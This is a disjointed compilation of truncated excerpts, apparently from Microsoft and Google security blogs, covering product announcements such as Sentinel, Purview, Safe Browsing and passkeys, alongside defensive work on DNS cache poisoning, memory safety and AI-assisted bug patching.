You can read more about Microsoft’s approach to securing generative AI with new tools we recently announced as available or coming soon to Microsoft Azure AI Studio for generative AI app developers.

While Crescendo attacks were a surprising discovery, it is important to note that these attacks did not directly pose a threat to the privacy of users otherwise interacting with the Crescendo-targeted AI system, or the security of the AI system, itself.

Microsoft Azure AI Content Safety is an example of this approach.

Microsoft Azure AI Content Safety is an example of this approach.

Microsoft’s own procedure is explained here: Microsoft AI Bounty.

Join us a day early, on Sunday, May 5, 2024, at Microsoft Pre-Day to kick-off RSA Conference 2024, and hear directly from our Microsoft Security Business leaders, including Vasu Jakkal, Corporate Vice President, Microsoft Security Business, and Charlie Bell, Executive Vice President, Microsoft Security.

Plus, view live demos at a variety of Microsoft sessions happening throughout the conference in breakout rooms and at our booth #6044N.

They’ll reflect on the latest developments in cybersecurity, AI, and how the global community of cyber professionals can work together for a more secure future.

Check out one or all of our Microsoft Security sessions included in the RSA Conference agenda.

Vi…

Today, I am excited to announce the public preview of our unified security operations platform.

Onboarding a Microsoft Sentinel workspace only takes a few minutes, and customers can continue to use their Microsoft Sentinel in Azure.

Unified security operations platform The new platform brings together the capabilities of XDR and SIEM.

Fortunately, the Microsoft Security Exposure Management solution, built right into the new unified platform experience, consolidates silos into a contextual and risk-based view.

If you’d like to join the public preview, view the prerequisites and how to connect your Microsoft Sentinel workplace.

Microsoft Priva Privacy AssessmentsBuild the foundation of your privacy posture with Microsoft Priva Privacy Assessments—a solution that automates the discovery, documentation, and evaluation of personal data use across your entire data estate.

Embed your custom privacy risk framework into each assessment to programmatically identify the factors contributing to privacy risk.

Microsoft Priva Privacy Risk ManagementMicrosoft Priva Privacy Risk Management is here to empower you to simplify the identification of unstructured personal data usage.

Key featuresEfficiently manage subject rights requests : Streamline the fulfillment of subject rights request tasks using configurable settings within …

The future of compliance and data governance is here: Introducing Microsoft Purview Read moreIn 2022, we introduced Microsoft Purview, a comprehensive set of solutions that let you secure, govern, and ensure compliance across your data estate.

Confidently activate your data with modern data governanceWe are thrilled to introduce the new Microsoft Purview Data Governance experience.

This new reimagined software as a service (SaaS) solution offers sophisticated yet simple business-friendly interaction, integration across your multicloud data estate, and actionable insights that help data leaders to responsibly unlock business value within their data estate.

If you’re attending, don’t miss the…

Generative AI has emerged as a powerful and popular tool to automate content creation and simple tasks.

In this blog post, we'll explore reporting and enforcement policies that enterprise security teams can implement within Chrome Enterprise Premium for data loss prevention (DLP).

Chrome Enterprise DLP rules give IT admins granular control over browser activities, such as entering financial information in Gen AI websites.

As enterprises work through their policies and processes involving GenAI, Chrome Enterprise Premium empowers them to strike the balance that works best.

Learn more about how Chrome Enterprise can secure businesses just like yours here.

How location crowdsourcing works on the Find My Device networkThe Find My Device network locates devices by harnessing the Bluetooth proximity of surrounding Android devices.

Nearby Android devices participating in the Find My Device network report the location of the Bluetooth tag.

With end-to-end encrypted location data, Google cannot decrypt, see, or otherwise use the location data.

The Find My Device network is also compliant with the integration version of the joint industry standard for unwanted tracking.

We have an unwavering commitment to continue to improve user protections on Find My Device and prioritize user safety.

In this post, we will look at DNS cache poisoning attacks and how Google Public DNS addresses the risks associated with them.

DNS Cache Poisoning AttacksDNS lookups in most applications are forwarded to a caching resolver (which could be local or an open resolver like.

For an excellent introduction to cache poisoning attacks, please see “An Illustrated Guide to the Kaminsky DNS Vulnerability”.

Cache poisoning mitigations in Google Public DNSImproving DNS security has been a goal of Google Public DNS since our launch in 2009.

To enhance DNS security, we recommend that DNS server operators support one or more of the security mechanisms described here.

Address Sanitizer (ASan) overviewAddress sanitizer is a compiler-based instrumentation tool used to identify invalid memory access operations during runtime.

The KASan runtime routines implemented in the Linux kernel serve as a great example of how to define a KASan runtime for targets which aren’t supported by default with -fsanitize=address .

Memory access checkThe routines __asan_loadXX_noabort , __asan_storeXX_noabort perform verification of memory access at runtime.

This routine takes as input a target memory address and sets the corresponding byte in shadow memory to the value of YY .

Essentially, we would need to instrument the memory allocator with the code which unpoisons KASan sha…

That’s why we're excited to announce a new version of Safe Browsing that will provide real-time, privacy-preserving URL protection for people using the Standard protection mode of Safe Browsing in Chrome.

Introducing real-time, privacy-preserving Safe BrowsingHow it worksIn order to transition to real-time protection, checks now need to be performed against a list that is maintained on the Safe Browsing server.

With OHTTP, Safe Browsing does not see your IP address, and your Safe Browsing checks are mixed amongst those sent by other Chrome users.

Since the privacy server doesn’t know the private key, it cannot decrypt the hash prefixes, which offers privacy from the privacy server itself.

I…

To further our engagement with top security researchers, we also hosted our yearly security conference ESCAL8 in Tokyo.

Android and Google DevicesIn 2023, the Android VRP achieved significant milestones, reflecting our dedication to securing the Android ecosystem.

The Google Play Security Reward Program continued to foster security research across popular Android apps on Google Play.

All of this resulted in $2.1M in rewards to security researchers for 359 unique reports of Chrome Browser security bugs.

Thank you to the Chrome VRP security researcher community for your contributions and efforts to help us make Chrome more secure for everyone!

The latest news and insights from Google on security and safety on the Internet

Google Play, for example, carries out rigorous operational reviews to ensure app safety, including proper high-risk API use and permissions handling.

We recently launched enhanced Google Play Protect real-time scanning to help better protect users against novel malicious Internet-sideloaded apps.

This feature, now deployed on Android devices with Google Play Services in India, Thailand, Singapore and Brazil, has already made a significant impact on user safety.

To help better protect Android users from these financial fraud attacks, we are piloting enhanced fraud protection with Google Play Protect.

Our commitment to protecting Android usersWe believe industry collaboration is essential to …

At the time, Rust was already in wide use across Android and other Google products.

Our announcement emphasized our commitment to improving the security reviews of Rust code and its interoperability with C++ code.

Rust is one of the strongest tools we have to address memory safety security issues.

We’re also furthering our existing commitment to the open-source Rust community by aggregating and publishing audits for Rust crates that we use in open-source Google projects.

As these improvements have continued, we’ve seen a reduction in the barriers to adoption and accelerated adoption of Rust.

Google takes the threat of cybercrime very seriously, and dedicates significant resources to combating it.

Such safeguards aren’t just important to ensuring free expression and human rights, they are also critical to protecting web security.

The Cybercrime Treaty should not criminalize the work of legitimate cybersecurity researchers and penetration testers, which is designed to protect individual systems and the web as a whole.

At the same time, Member States should avoid attempts to criminalize activities that raise significant freedom of expression issues, or that actually undercut the treaty’s goal of reducing cybercrime.

We urge Member States to heed calls from civil society groups to …

The AI world moves fast, so we’ve been hard at work keeping security apace with recent advancements.

One of our approaches, in alignment with Google’s Safer AI Framework (SAIF), is using AI itself to automate and streamline routine and manual security tasks, including fixing security bugs.

Last year we wrote about our experiences using LLMs to expand vulnerability testing coverage, and we’re excited to share some updates.

We’ll also show you how we’re using AI to speed up the bug patching process.

If you’re interested in using LLMs to patch bugs, be sure to read our paper on building an AI-powered patching pipeline.

This is why the Pixel team has been especially excited about passkeys—the easier, safer alternative to passwords.

As part of last December’s Pixel Feature Drop, we introduced a new feature to Google Password Manager: passkey upgrades.

With this new feature, Google Password Manager will let you discover which of your accounts support passkeys, and help you upgrade with just a few taps.

This new passkey upgrade experience is now available on Pixel phones (starting from Pixel 5a) as well as Pixel Tablet.

Google Password manager will incorporate these updates for other platforms in the future.

Welcome back to our latest update on MiraclePtr, our project to protect against use-after-free vulnerabilities in Google Chrome.

Our analysis is based on two primary information sources: incoming vulnerability reports and crash reports from user devices.

MiraclePtr effectively mitigated 57% of these use-after-free vulnerabilities in privileged processes, exceeding our initial estimate of 50%.

Impressively, five of the six were discovered while investigating MiraclePtr crash reports!

ConclusionIn summary, MiraclePtr has proven to be effective in mitigating use-after-free vulnerabilities and enhancing the overall security of the Chrome browser.

Beyond security, addressing the issues uncovered by these sanitizers improves code health and overall stability, reducing resources spent addressing bugs in the future.

Baseband security and exploitation has been a recurring theme in security conferences for the last decade.

For example, we consider vulnerabilities allowing Remote Code Execution (RCE) in the cellular baseband to be of CRITICAL severity.

Aside from uncovering security vulnerabilities, this stage is highly effective at uncovering code quality and stability bugs that could result in instability on user devices.

There is no need to rewrite everything in Rust, as Rust provides a strong C FFI support and easily interfaces with ex…

Systems such as Gmail, YouTube and Google Play rely on text classification models to identify harmful content including phishing attacks, inappropriate comments, and scams.

To help make text classifiers more robust and efficient, we’ve developed a novel, multilingual text vectorizer called RETVec (Resilient & Efficient Text Vectorizer) that helps models achieve state-of-the-art classification performance and drastically reduces computational cost.

RETVec-based Gmail Spam filter improvements.

RETVec is a novel open-source text vectorizer that allows you to build more resilient and efficient server-side and on-device text classifiers.

The Gmail spam filter uses it to help protect Gmail inboxe…